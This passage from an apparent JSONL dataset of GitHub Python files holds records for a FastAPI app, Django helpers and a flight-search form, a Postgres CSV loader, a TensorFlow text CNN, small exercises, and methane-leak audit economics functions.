create_tables()\n\n\napp.include_router(api_router)\n\n# Admin panel\nadmin = Admin(app, engine, \"/api/v1/admin/\")\nadmin.add_view(ProfileAdmin)\n","repo_name":"HAtherlolz/fastapi_lesson","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23671573492","text":"import json\nfrom django.core.exceptions import ImproperlyConfigured\n\nwith open(\"configuracion.json\") as f:\n valor = json.loads(f.read())\n\ndef get_value(titulo, valores=valor):\n try:\n return valores[titulo]\n except:\n raise ImproperlyConfigured(f\"El nombre {titulo} no existe o no ha sido declarado\")\n ","repo_name":"msmodadev/msmoda","sub_path":"app_core_msmoda/get_values_from_json.py","file_name":"get_values_from_json.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20667569793","text":"import psycopg2\n# Connection parameters\nparam_dic = {\n \"host\" : \"localhost\",\n \"database\" : \"postgres\",\n \"user\" : \"postgres\",\n \"password\" : \"admin\"\n}\n\ndef connect(params_dic):\n conn=None\n conn=psycopg2.connect(**params_dic)\n return conn\n\ndef copy_from_file(conn,schema,table):\n filename=f\"./data/{table}.csv\"\n tablename=f\"{schema}.{table}\"\n truncate_table_query=f\"TRUNCATE TABLE {tablename} CASCADE\"\n f=open(filename,'r')\n copy_sql = f\"COPY {tablename} FROM stdin DELIMITER \\',\\' CSV header;\"\n cursor=conn.cursor()\n cursor.execute(truncate_table_query)\n cursor.copy_expert(copy_sql,f)\n conn.commit()\n cursor.close()\n\nconn = connect(param_dic)\ncopy_from_file(conn, 'employees_schema', 'titles')\ncopy_from_file(conn, 'employees_schema', 'employees')\ncopy_from_file(conn, 'employees_schema', 'departments')\ncopy_from_file(conn, 'employees_schema', 'dept_manager')\ncopy_from_file(conn, 'employees_schema', 'dept_emp')\ncopy_from_file(conn, 'employees_schema', 'salaries')\nconn.close() # close the connection","repo_name":"suhailmemon01101984/dataeng-project01","sub_path":"load_tables.py","file_name":"load_tables.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30373528345","text":"import json\r\nimport sys\r\n\r\n\r\ndef main():\r\n if sys.argv[1]=='reset':\r\n filew = open(\"/data/FAP/log/AOP_log.txt\", \"w+\")\r\n filew.write('[]')\r\n filew.close()\r\n else:\r\n filer = open(\"/data/FAP/log/AOP_log.txt\", \"r+\")\r\n fileaString = filer.read()\r\n data_s=filer.tell()\r\n filer.close()\r\n if sys.argv[1]=='data':\r\n data='{\"'+sys.argv[2]+'\":\"'+sys.argv[3]+'\"}'\r\n if sys.argv[1]=='val':\r\n data='{\"'+sys.argv[2]+'\":['+sys.argv[3]+']}'\r\n if 1:\r\n filew = open(\"/data/FAP/log/AOP_log.txt\", \"w+\")\r\n filew.write(fileaString)\r\n filew.seek(data_s-1)\r\n if data_s!=2:\r\n filew.write(',')\r\n filew.write(data)\r\n filew.write(']')\r\n filew.close()\r\n \r\n \r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"TadiT7/trochilus_trochilus_dump","sub_path":"vendor/bin/org.qpython.qpy3/files/bin/j1.py","file_name":"j1.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2817106482","text":"\nVOWELS = ['a', 'e', 'i', 'o', 'u', 'A', 'E', 'I', 'O', 'U']\n\n\ndef vowel_count(word):\n vowels = list()\n for letter in list(word):\n if letter in VOWELS:\n vowels.append(letter)\n\n return len(vowels)\n\n\nif __name__ == '__main__':\n v = vowel_count(\"SIddesh\")\n print(v)","repo_name":"siddeshbg/vowel-count-rest-api","sub_path":"vowel_count/api/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27224751446","text":"import tensorflow as tf\nimport numpy as np\nimport os, sys, re\n\nsys.path.append('../')\nfrom misc.data_prep import *\nfrom hyperparam import Hyperparam as hp\n\nclass Cnn_Graph():\n '''graph for text cnn'''\n def __init__(self, vocab_size, maxlen, is_training=True):\n\n self.graph = tf.Graph()\n\n with self.graph.as_default():\n\n # if training, directly feed tf data\n if is_training:\n self.iter = batch_tf_data(\"cnn\", hp.datapath)\n self.x, self.y = self.iter.get_next()\n\n # if inference, feed data with feed dict\n else:\n self.x = tf.placeholder(tf.int32, [None, maxlen], name='input')\n self.y = tf.placeholder(tf.float32, [None, hp.num_tags], name='label')\n\n x = self.x\n\n # embedding for words\n with tf.name_scope('embedding'):\n self.Emb = tf.Variable(tf.random_uniform([vocab_size, hp.emb_size_cnn], -1.0, 1.0), name='emb')\n # [None, sequence_length, embedding_size]\n embedded_chars = tf.nn.embedding_lookup(self.Emb, x)\n # [None, sequence_length, embedding_size, 1]\n embedded_chars = tf.expand_dims(embedded_chars, -1)\n print(embedded_chars)\n\n # convolution\n pooled_outputs = []\n\n for i, filter_size in enumerate(hp.filter_sizes):\n with tf.name_scope('conv-maxpool-%s' % filter_size):\n # convolution\n filter_shape = [filter_size, hp.emb_size_cnn, 1, hp.num_filters]\n W = tf.Variable(tf.truncated_normal(filter_shape, stddev=0.1), name='W')\n b = tf.Variable(tf.constant(0.1, shape=[hp.num_filters]), name='b')\n conv = tf.nn.conv2d(\n embedded_chars,\n W,\n strides=[1, 1, 1, 1],\n padding='VALID',\n name='conv')\n h = tf.nn.relu(tf.nn.bias_add(conv, b), name='relu')\n #print(h)\n pooled = tf.nn.max_pool(\n h,\n ksize=[1, maxlen - filter_size + 1, 1, 1],\n strides=[1, 1, 1, 1],\n padding='VALID',\n name='pool')\n pooled_outputs.append(pooled)\n #print(pooled)\n\n # concat output from 3 filters\n num_filters_total = hp.num_filters * len(hp.filter_sizes)\n h_pool = tf.concat(pooled_outputs, 3)\n h_pool_flat = tf.reshape(h_pool, [-1, num_filters_total])\n\n # dropout\n with tf.name_scope('dropout'):\n h_drop = tf.layers.dropout(h_pool_flat, hp.dropout_prob, training=tf.convert_to_tensor(is_training))\n\n # prediction\n with tf.name_scope('output'):\n W = tf.get_variable('W', shape=[num_filters_total, hp.num_tags],\n initializer=tf.contrib.layers.xavier_initializer())\n b = tf.Variable(tf.constant(0.1, shape=[hp.num_tags]), name='b')\n\n scores = tf.nn.xw_plus_b(h_drop, W, b, name='scores')\n self.predictions = tf.argmax(scores, 1, name='predictions')\n\n # gain accuracy\n with tf.name_scope('accuracy'):\n correct_predictions = tf.equal(self.predictions, tf.argmax(self.y, 1))\n self.accuracy = tf.reduce_mean(tf.cast(correct_predictions, 'float'), name='accuracy')\n\n # calculate loss and minimize by adam optimizer\n if is_training:\n with tf.name_scope('loss'):\n losses = tf.nn.softmax_cross_entropy_with_logits_v2(labels=self.y, logits=scores)\n self.loss = tf.reduce_mean(losses)\n self.optimizer = tf.train.AdamOptimizer(hp.lr).minimize(self.loss)\n\n #define saver\n self.saver = tf.train.Saver()\n\ndef train_cnn():\n\n # load necessary data and parameter\n input_data, target_data = load_train_data(\"cnn\", hp.datapath)\n word_dict = load_pickle(os.path.join(hp.datapath, \"dict.pkl\"))\n vocab_size = len(word_dict)\n maxlen = input_data.shape[1]\n num_batch = input_data.shape[0] // hp.batch_size\n\n # define graph\n cnn = Cnn_Graph(vocab_size, maxlen)\n print(\"Graph loaded\")\n\n with tf.Session(graph=cnn.graph) as sess:\n\n # load from checkpoint\n if tf.train.get_checkpoint_state(hp.logdir_c):\n cnn.saver.restore(sess, tf.train.latest_checkpoint(hp.logdir_c))\n start_epoch, global_step = re.findall(\"[0-9]+\", tf.train.latest_checkpoint(hp.logdir_c))\n start_epoch = int(start_epoch)+1\n global_step = int(global_step)\n #print(start_epoch, global_step)\n print('model restored')\n\n # or initialize\n else:\n sess.run(tf.global_variables_initializer())\n global_step = 0\n start_epoch = 1\n\n for epoch in range(start_epoch, hp.num_epochs_cnn+1):\n\n epoch_loss = 0\n\n # initialize batch iteratior\n sess.run(cnn.iter.initializer)\n\n for step in range(num_batch):\n\n # optimize\n _, step_loss = sess.run([cnn.optimizer, cnn.loss])\n epoch_loss += step_loss\n global_step += 1\n\n print(\"Current Epoch : {:02d} Loss: {:.4f}\".format(epoch, epoch_loss/num_batch))\n\n if epoch % 5 == 0:\n cnn.saver.save(sess, hp.logdir_c + '/model_epoch_{:02d}_gs_{:d}' .format(epoch, global_step))\n\nif __name__ == '__main__':\n os.chdir(\"../\")\n train_cnn()\n\n","repo_name":"KYJun/emotional_chatbot","sub_path":"script/text_cnn/train_cnn.py","file_name":"train_cnn.py","file_ext":"py","file_size_in_byte":5762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42289405300","text":"# Desenvolva um programa que leia o nome, idade e sexo de 4 pessoas. No final do programa, mostre:\n# - A média do grupo.\n# - Qual é o nome do homem mais velho.\n# - Quantas mulheres tem menos de 20 anos.\n\npessoas = []\nhomemvelho = 0\nnomehomem = ''\nmulheresnovas = 0\nmedia = 0\n\nwhile len(pessoas) < 4:\n print(f'--- {len(pessoas)+1} Pessoa ---')\n pessoa = [str(input('Nome: ')), int(input('Idade: ')), str(input('Sexo: '))]\n pessoas.append(pessoa)\n\nfor c in pessoas:\n media += c[1]\n if c[1] < 20 and c[2] == 'f':\n mulheresnovas += 1\n elif c[2] == 'm':\n if homemvelho < c[1]:\n nomehomem = c[0]\n homemvelho = c[1]\n\nprint(f'A média das pessoas são de {media / len(pessoas)} anos.'\n f'\\nO homem mais velho é o {nomehomem}, com {homemvelho}, e temos {mulheresnovas} mulheres com menos de 20 anos')\n","repo_name":"gualourenco/CursoEmVideoPython","sub_path":"ex056.py","file_name":"ex056.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11848590579","text":"import datetime as dt\nfrom django.core.exceptions import ValidationError\nfrom django.shortcuts import render\nfrom django.utils.translation import ugettext_lazy as _\nfrom django import forms\nfrom .widgets import BootstrapDateTimePickerInput, XDSoftDateTimePickerInput\nfrom bootstrap_datepicker_plus import DatePickerInput\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Layout, Fieldset, ButtonHolder, Submit, Div, Row, Column\nfrom django.urls import reverse\n\ndatepicker_widget = DatePickerInput(\n options={'format': 'DD/MM/YYYY', # moment date-time format\n 'showClose': True,\n 'showClear': True,\n 'showTodayButton': True})\n\n\nclass FlightSearchInputForm(forms.Form):\n \"\"\"Form for a user to give inputs for a round trip.\"\"\"\n\n flight_type = forms.ChoiceField(label='Flight Type',\n initial='round',\n choices=(('round', 'Return'),\n ('oneway', 'One way')))\n fly_from = forms.CharField(label='Fly from',\n initial='Barcelona',\n max_length=20)\n fly_to = forms.CharField(label='Fly to',\n # initial='Madrid',\n widget=forms.TextInput(attrs={'placeholder': 'try a destination...'}),\n max_length=20)\n date_from = forms.DateTimeField(label='Departure date from',\n initial=dt.datetime.today().strftime('%d/%m/%Y'),\n # initial='15/06/2020',\n input_formats=['%d/%m/%Y'],\n widget=datepicker_widget)\n date_to = forms.DateTimeField(label='Departure date to',\n initial=(dt.datetime.today() + dt.timedelta(days=1)).strftime('%d/%m/%Y'),\n input_formats=['%d/%m/%Y'],\n widget=datepicker_widget)\n return_from = forms.DateTimeField(label='Return date from',\n initial=(dt.datetime.today() + dt.timedelta(days=7)).strftime('%d/%m/%Y'),\n input_formats=['%d/%m/%Y'],\n widget=datepicker_widget,\n required=False)\n return_to = forms.DateTimeField(label='Return date to',\n initial=(dt.datetime.today() + dt.timedelta(days=8)).strftime('%d/%m/%Y'),\n input_formats=['%d/%m/%Y'],\n widget=datepicker_widget,\n required=False)\n nights_in_dst_from = forms.IntegerField(label='Nights in destination from',\n # initial=5,\n min_value=0, max_value=360,\n required=False)\n nights_in_dst_to = forms.IntegerField(label='Nights in destination to',\n # initial=15,\n min_value=0, max_value=360,\n required=False)\n max_fly_duration = forms.IntegerField(label='Max of flight duration',\n # initial=25,\n min_value=0, max_value=100,\n required=False)\n selected_cabins = forms.ChoiceField(label='Cabin', initial='M',\n choices=(('M', 'Economy'),\n ('W', 'Economy Premium'),\n ('C', 'Business'),\n ('F', 'First Class')))\n # partner_market = 'es'\n # locale = 'us'\n # curr = 'EUR'\n price_from = forms.IntegerField(label='Price from',\n # initial=0,\n min_value=0, max_value=10000,\n required=False)\n price_to = forms.IntegerField(label='Price to',\n # initial=1200,\n min_value=0, max_value=10000,\n required=False)\n max_stopovers = forms.IntegerField(label='Max stopovers',\n # initial=3,\n min_value=0, max_value=10,\n required=False)\n # select_airlines =\n # select_airlines_exclude = False\n sort = forms.ChoiceField(label='Sort by', initial='quality',\n choices=(('quality', 'Best'),\n ('price', 'Price'),\n ('duration', 'Duration'),\n ('date', 'Date')))\n # asc = 1\n num_results = forms.IntegerField(label='Options to show', initial=10, min_value=1, max_value=150, required=True)\n\n def __init__(self, *args, **kwargs):\n super(FlightSearchInputForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_class = 'flight_search_input_form'\n # self.helper.form_id = 'flight_search_input_form'\n # self.helper.form_method = 'post'\n # self.helper.form_action = reverse('index')\n # self.helper.add_input(Submit('submit', 'Submit'))\n\n flight_type = self.fields.get('flight_type')\n if flight_type == 'oneway':\n self.fields['nights_in_dst_from'].widget.attrs['disabled'] = 'true'\n\n self.helper.layout = Layout(\n Row(Column('flight_type', css_class='form-group col-md-6 mb-0'),\n # Column('apikey', css_class='form-group col-md-6 mb-0'),\n css_class='form-row'\n ),\n Row(Column('fly_from', css_class='form-group col-md-6 mb-0'),\n Column('fly_to', css_class='form-group col-md-6 mb-0'),\n css_class='form-row'\n ),\n # Row(Div('Departure')), # TODO Add text 'departure'\n Row(Column('date_from', css_class='form-group col-md-6 mb-0'),\n Column('date_to', css_class='form-group col-md-6 mb-0'),\n css_class='form-row'\n ),\n Row(Column('return_from', css_class='form-group col-md-6 mb-0'),\n Column('return_to', css_class='form-group col-md-6 mb-0'),\n css_class='form-row'\n ),\n Row(Column('nights_in_dst_from', css_class='form-group col-md-6 mb-0'),\n Column('nights_in_dst_to', css_class='form-group col-md-6 mb-0'),\n css_class='form-row'\n ),\n Row(Column('price_from', css_class='form-group col-md-6 mb-0'),\n Column('price_to', css_class='form-group col-md-6 mb-0'),\n css_class='form-row'\n ),\n Row(Column('max_fly_duration', css_class='form-group col-md-4 mb-0'),\n Column('selected_cabins', css_class='form-group col-md-4 mb-0'),\n Column('max_stopovers', css_class='form-group col-md-4 mb-0'),\n css_class='form-row'\n ),\n Row(Column('sort', css_class='form-group col-md-6 mb-0'),\n Column('num_results', css_class='form-group col-md-6 mb-0'),\n css_class='form-row'\n ),\n Submit('submit', 'Submit')\n )\n\n def clean(self):\n # data = self.cleaned_data\n data = super().clean()\n\n if data['flight_type'] == 'oneway':\n # user inputs return dates\n if data['return_from'] is not None or data['return_to'] is not None:\n raise ValidationError('No return dates required in one-way flights. Please clear selection.')\n\n # user inputs nights_in_dst\n if data['nights_in_dst_from'] is not None or data['nights_in_dst_to'] is not None:\n raise ValidationError('No nights in destination required in one-way flights. Please clear selection.')\n\n if data['flight_type'] == 'round':\n # user didn't specify neither return dates nor nights_in_dst\n if (data['return_from'] is None or data['return_to'] is None) \\\n and (\n data['nights_in_dst_from'] is None or data['nights_in_dst_to'] is None):\n raise ValidationError('Please specify return dates or nights in destination period.')\n\n # user chose both nights_in_dst\n elif data['nights_in_dst_from'] is not None and data['nights_in_dst_to'] is not None:\n # user also chose one from return dates\n if (data['return_from'] is None and data['return_to'] is not None) or \\\n (data['return_from'] is not None and data['return_to'] is None):\n raise ValidationError('Please specify both return dates.')\n\n # user chose both return dates\n elif data['return_from'] is not None and data['return_to'] is not None:\n # user also chose one from nights_in_dst\n if (data['nights_in_dst_from'] is None and data['nights_in_dst_to'] is not None) or \\\n (data['nights_in_dst_from'] is not None and data['nights_in_dst_to'] is None):\n raise ValidationError('Please specify full nights in destination period.')\n\n # user chose return dates earlier than departure dates\n if (data['return_from'] < data['date_from']) or \\\n (data['return_to'] < data['date_to']):\n raise ValidationError('Return date cannot be earlier than departure date.')\n\n # user chose return date to earlier than return date from\n if data['return_to'] < data['return_from']:\n raise ValidationError('Return date to cannot be earlier than return date from.')\n\n # user chose departure date to earlier than departure date from\n if data['date_to'] < data['date_from']:\n raise ValidationError('Departure date to cannot be earlier than departure date from.')\n\n return data\n","repo_name":"yanismathiopoulos/django_flight_tracker","sub_path":"home/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":10376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42618359840","text":"# outcomes_analysis_derivative_functions.py\n# (major revision #2)\n# Imported by outcomes_analysis.py\n\nimport numpy as np\nimport scipy.sparse\n\nfrom collections import namedtuple\nimport json\n\n\nAuditInfo = namedtuple(\n \"AuditInfo\",\n [\"audit_rule\", \"audit_frac\", \"τT\", \"detect_threshold\", \"audit_cost\"]\n # Expected types: string, float, float, float\n)\n\n# Container to pass data around\nDataParam = namedtuple(\n \"DataParam\",\n [\n \"price_H\", # price * H, units of dollar-hour per kg. Array with shape (N,)\n \"e_size_expect\", # expected leak size, units of kg per hr. Array with shape (N,)\n \"e_size_draw\", # draw of leak size, units of kg per hr. Array with shape (N,)\n \"cost_coef\", # expected leak size, units of kg per hr. Array with shape (N, 2)\n \"time_H\", # Time period H the well uses. Float.\n \"prob_is_large\", # probability leak size is over detection threshold. Shape (N,)\n \"gas_avg_mcfd\", # well pad's average daily production for the month observed. Shape (N,)\n ],\n)\n\nOutcomesOneDraw = namedtuple(\n \"OutcomesOneDraw\",\n [\n \"dwl_mean\",\n \"dwl_tot\",\n \"emis_mean\",\n \"emis_tot\",\n \"tot_cost_per_kg_mean\",\n \"fee_per_kg_mean\",\n \"fee_per_kg_med\",\n \"fee_per_kg_p10\",\n \"fee_per_kg_p90\",\n \"net_private_cost_per_mcf_pct_price\",\n \"shadow_price\",\n \"audit_rule\",\n \"audit_frac\",\n \"τT\",\n \"detect_threshold\",\n \"audit_cost\",\n ],\n)\n\n\ndef dwl_per_well(t_effective, data_param):\n \"\"\"\n Deadweight loss from setting t < δ\n\n Note that this function is used for scoring, but not for targeting audits,\n so we use draw_param.e_size_draw.\n \"\"\"\n A = data_param.cost_coef[..., 0]\n α = data_param.cost_coef[..., 1]\n recip_α = 1 / α\n recip_α_plus1 = 1 / (α + 1)\n recip_A = 1 / A\n e_pH_τT_r = data_param.e_size_draw * (data_param.price_H + t_effective)\n e_p_δ_H = data_param.e_size_draw * (\n data_param.price_H + data_param.time_H * SOCIAL_COST_METHANE_PER_KG\n )\n dwl = ((e_p_δ_H - e_pH_τT_r * recip_α_plus1) * (e_pH_τT_r * recip_A) ** recip_α) - (\n α * recip_α_plus1 * e_p_δ_H * (e_p_δ_H * recip_A) ** recip_α\n )\n return dwl\n\n\ndef dwl_terms_for_objective(self, r):\n \"\"\"\n Objective function, omitting the parts that don't depend on r.\n\n Note, despite the name `self`, this isn't actually a class method, but we'll\n use a class method to call it.\n r may have shape (N,) or (1,)\n \"\"\"\n dwl_terms = (\n self.e_p_δ_H - (self.e * self.recip_α_plus1 * (self.pH + self.τT * r))\n ) * (self.e * (self.pH + self.τT * r) * self.recip_A) ** self.recip_α\n return dwl_terms\n\n\ndef objective_dwl(self, r):\n \"\"\"\n dwl_terms_for_objective is a separate function so we can take the unweighted\n sum of DWL terms here and the weighted sum later\n \"\"\"\n return np.sum(dwl_terms_for_objective(self, r))\n\n\ndef dwl_diff1(self, r):\n diff1 = (\n self.recip_A ** (self.recip_α)\n * (self.e) ** (1.0 + self.recip_α)\n * self.τT\n * (self.δH - self.τT * r)\n * (self.pH + self.τT * r) ** (self.recip_α - 1.0)\n * self.recip_α\n )\n return diff1\n\n\ndef dwl_diff2(self, r):\n diff2 = (\n self.recip_A ** (self.recip_α)\n * self.e ** (1.0 + self.recip_α)\n * self.τT ** 2\n * (self.pH + self.τT * r) ** (self.recip_α - 2.0)\n * (-self.α * (self.δH + self.pH) + self.δH - self.τT * r)\n * self.recip_α ** 2\n )\n return diff2\n\n\ndef dwl_uniform_incl_cost(self, r):\n # Just like dwl_target_x_incl_cost, except multiply r by N instead of summing\n return objective_dwl(self, r) + self.audit_cost * self.N * r\n\n\ndef dwl_uniform_incl_cost_diff1(self, r):\n # Just like dwl_target_x_incl_cost_diff1 except sum of terms.\n return np.sum(dwl_diff1(self, r) + self.audit_cost)\n\n\ndef dwl_target_x_incl_cost(self, r):\n return objective_dwl(self, r) + self.audit_cost * cost_target_x(self, r)\n\n\ndef dwl_target_x_incl_cost_diff1(self, r):\n # cost_target_x_diff1 is all 1, so just rely on numpy broadcasting here.\n return dwl_diff1(self, r) + self.audit_cost\n\n\ndef dwl_target_x_incl_cost_diff2(self, r):\n # cost_target_x_diff2 is all 0, so just drop the cost term.\n return dwl_diff2(self, r)\n\n\ndef dwl_target_e_low_detect_incl_cost(self, r):\n return objective_dwl(self, r) + self.audit_cost * cost_target_e_low_detect(self, r)\n\n\ndef dwl_target_e_low_detect_incl_cost_diff1(self, r):\n return dwl_diff1(self, r) + self.audit_cost * prob_leak_times_r_diff1(self, r)\n\n\ndef dwl_target_e_low_detect_incl_cost_diff2(self, r):\n return dwl_diff2(self, r) + self.audit_cost * prob_leak_times_r_diff2(self, r)\n\n\ndef cost_target_e_low_detect(self, r):\n return np.sum(prob_leak_times_r(self, r))\n\n\ndef cost_target_x(self, r):\n return np.sum(r)\n\n\ndef prob_leak_times_r(self, r):\n \"\"\"\n Value of (1 - q(r)) * r\n (= r * (e * (p * H + τT * r) / A) ** (1 / α))\n \"\"\"\n return r * (self.e * (self.pH + self.τT * r) * self.recip_A) ** (self.recip_α)\n\n\ndef prob_leak_times_r_diff1(self, r):\n r\"\"\"\n Value of d [(1 - q(r)) * r] / dr\n\n A^{- \\frac{1}{\\alpha}}\n e^{\\frac{1}{\\alpha}}\n (p H + r \\tau T)^{\\frac{1}{\\alpha} - 1}\n (\\alpha (p H + r \\tau T) + r \\tau T)\n \\frac{1}{\\alpha}\n \"\"\"\n diff1 = (\n self.recip_A ** (self.recip_α)\n * self.e ** self.recip_α\n * (self.pH + self.τT * r) ** (self.recip_α - 1)\n * (self.α * (self.pH + self.τT * r) + self.τT * r)\n * self.recip_α\n )\n return diff1\n\n\ndef prob_leak_times_r_diff2(self, r):\n r\"\"\"\n Value of d^2 [(1 - q(r)) * r] / dr^2\n\n \\frac{A^{- \\frac{1}{\\alpha}}\n e^{\\frac{1}{\\alpha}}\n \\tau\n (p H + r \\tau T)^{\\frac{1}{\\alpha} - 2}\n (2 \\alpha p H + \\alpha r \\tau T + r \\tau T)\n \\frac{1}{\\alpha^2}\n \"\"\"\n diff2 = (\n self.recip_A ** (self.recip_α)\n * self.e ** self.recip_α\n * self.τT\n * (self.pH + self.τT * r) ** (self.recip_α - 2.0)\n * (self.α * (2 * self.pH + self.τT * r) + self.τT * r)\n * self.recip_α ** 2\n )\n return diff2\n\n\ndef prob_no_leak(self, r):\n r\"\"\"\n Value of q(r) = 1 - (e * (p * H + τ * T * r) / A) ** (1 / α)\n \"\"\"\n prob = 1 - (self.e * (self.pH + self.τT * r) * self.recip_A) ** self.recip_α\n return prob\n\n\ndef prob_no_leak_diff1(self, r):\n r\"\"\"\n Value of d q(r) / dr\n\n q(r) = 1 - (e * (p * H + τ * T * r) / A) ** (1 / α)\n\n d q(r) / dr=\n -(1 / A) ** (1 / α) * T * τ * e ** (1 / α) *\n (H * p + T * τ * r) ** (1 / α - 1) / (α)\n\n \"\"\"\n diff1 = -(\n self.recip_A ** (self.recip_α)\n * self.τT\n * self.e ** (self.recip_α)\n * (self.pH + self.τT * r) ** (self.recip_α - 1)\n * self.recip_α\n )\n return diff1\n\n\ndef prob_no_leak_diff2(self, r):\n r\"\"\"\n Value of d^2 q(r) / dr^2\n Where q(r) = 1 - (e * (p * H + τ * T * r) / A) ** (1 / α)\n second diff = = A ** (-1 / α) * (T * τ) ** 2 * e ** (1 / α)\n * (α - 1) * (H * p + T * r * τ) ** (1 / α) /\n (α ** 2 * (H * p + T * r * τ) ** 2)\n \"\"\"\n diff2 = (\n self.recip_A ** (self.recip_α)\n * self.τT ** 2\n * self.e ** (self.recip_α)\n * (self.α - 1)\n * (self.pH + self.τT * r) ** (self.recip_α - 2)\n * self.recip_α ** 2\n )\n return diff2\n\n\ndef cost_target_x_diff1(self, r):\n r\"\"\"\n The first derivative of the target-x budget term wrt r_i\n \"\"\"\n return np.ones_like(r)\n\n\ndef cost_target_x_diff2(self, r):\n r\"\"\"\n The second derivative of the target-x budget term wrt r_i\n \"\"\"\n return np.zeros_like(r)\n\n\ndef hessian_target_e_low_detect(self, r, lagrange, obj_factor):\n # The callback for calculating the Hessian (second deriv) of the lagrangian\n # lagrange is only one number because only one constraint.\n # fmt: off\n hess_diag = (\n obj_factor * dwl_diff2(self, r)\n + lagrange * prob_leak_times_r_diff2(self, r)\n )\n # fmt: on\n return hess_diag\n\n\ndef hessian_target_x(self, r, lagrange, obj_factor):\n # The callback for calculating the Hessian (second deriv) of the lagrangian\n # `lagrange` doesn't factor in because second deriv of target-x budget is 0\n hess_diag = obj_factor * dwl_diff2(self, r)\n return hess_diag\n\n\n# Same for incl_cost case:\nhessian_target_x_incl_cost = hessian_target_x\n\n\ndef hessian_uniform_incl_cost(self, r, lagrange, obj_factor):\n # Here r has length 1; the hessian is a 1x1 matrix\n assert len(lagrange) == 0\n hess = obj_factor * np.sum(dwl_diff2(self, r))\n return hess\n\n\ndef hessian_target_e_incl_cost(self, r, lagrange, obj_factor):\n assert len(lagrange) == 0\n hess_diag = obj_factor * dwl_target_e_low_detect_incl_cost_diff2(self, r)\n return hess_diag\n\n\ndef no_constraint(self, x):\n \"\"\"Provide a placeholder constraint function. Always zero.\"\"\"\n return 0.0\n\n\ndef no_jacobian(self, x):\n \"\"\"Provide a placeholder constraint function. Always zero.\"\"\"\n return np.zeros_like(x)\n\n\ndef cost_target_e_high_detect(self, r_big_r_small):\n r_big, r_small = _divide_up_r(self.N, r_big_r_small)\n terms = _probability_weight(\n self.prob_is_large,\n prob_leak_times_r(self, r_big) + prob_no_leak(self, r_big) * r_small,\n r_small,\n )\n return np.sum(terms)\n\n\ndef cost_target_e_high_detect_diff1(self, r_big_r_small):\n r\"\"\"\n Budget term is: (1 - q) * r + q * rho\n = r * (e * (p * H + τT * r) / A) ** (1 / α)\n + rho * (1 - (e * (p * H + τT * r) / A) ** (1 / α))\n\n The z-weighted deriv with respect to r (r_big) is:\n\n z * A^{- \\frac{1}{\\alpha}}\n e^{\\frac{1}{\\alpha}}\n (p H + r \\tau T)^{\\frac{1}{\\alpha} - 1}\n (\\alpha (p H + r \\tau T) + r \\tau T - \\rho \\tau T)\n \\frac{1}{\\alpha}\n\n The z-weighted deriv with respect to \\rho (r_small) is:\n 1 - A^{- \\frac{1}{\\alpha}} z \\left(H e p + T e r \\tau\\right)^{\\frac{1}{\\alpha}}\n \"\"\"\n r_big, r_small = _divide_up_r(self.N, r_big_r_small)\n\n diff1_wrt_r_big = self.prob_is_large * (\n prob_leak_times_r_diff1(self, r_big) + prob_no_leak_diff1(self, r_big) * r_small\n )\n diff1_wrt_r_small = self.prob_is_large * prob_no_leak(self, r_big) + (\n 1 - self.prob_is_large\n )\n if len(r_big_r_small) == 2:\n diff1_wrt_r_big = np.sum(diff1_wrt_r_big)\n diff1_wrt_r_small = np.sum(diff1_wrt_r_small)\n\n cost_diff1 = np.concatenate((diff1_wrt_r_big, diff1_wrt_r_small), axis=None)\n assert cost_diff1.shape == r_big_r_small.shape\n return cost_diff1\n\n\ndef hessian_target_e_high_detect(self, r_big_r_small, lagrange, obj_factor):\n r\"\"\"\n The hessian is a little tricky. r_big_r_small has length 2 or 2*N for the\n r and rho compondents, so we need to describe the problem to fit ipopt's\n understanding.\n\n The cross-partial matrix we need to describe is like this:\n ∂r_1 ... ∂r_N ∂rho_1 ... ∂rho_N\n ∂ r_1 |\n ⋮ A | B'\n ∂r_N |\n --------------------------------------\n ∂rho_1 |\n ⋮ B | C\n ∂rho_N |\n\n Block A: ∂^2 L / ∂^2 r_i^2\n i != j elements are zero\n\n Blocks B: ∂^2 L / ∂ r_i ∂ \\rho_i\n i != j elements are zero\n\n\n Block C: ∂^2 L / ∂^2 \\rho_i^2\n i != j elements are zero\n \"\"\"\n r_big, r_small = _divide_up_r(self.N, r_big_r_small)\n # Create the values labeled A, B, and C above\n block_A = obj_factor * self.prob_is_large * dwl_diff2(\n self, r_big\n ) + lagrange * self.prob_is_large * (\n prob_leak_times_r_diff2(self, r_big) + prob_no_leak_diff2(self, r_big) * r_small\n )\n block_B = lagrange * self.prob_is_large * prob_no_leak_diff1(self, r_big)\n block_C = obj_factor * (1 - self.prob_is_large) * dwl_diff2(self, r_small)\n if self.num_vars == 2:\n block_A = np.sum(block_A)\n block_B = np.sum(block_B)\n block_C = np.sum(block_C)\n # Expected output is a 1d array that will be interpreted as the COO matrix\n # values. The order of the output here need to match the order in\n # hessianstructure_target_e_high.\n return np.concatenate([block_A, block_B, block_C], axis=None)\n\n\ndef _divide_up_r(N, r_big_r_small):\n \"\"\"\n Helper function used in dwl_target_e_high_detect and\n dwl_target_e_high_detect_diff1\n \"\"\"\n if r_big_r_small.shape == (2,):\n # Maybe avoid making these temp arrays?\n r_big = np.full((N,), r_big_r_small[0])\n r_small = 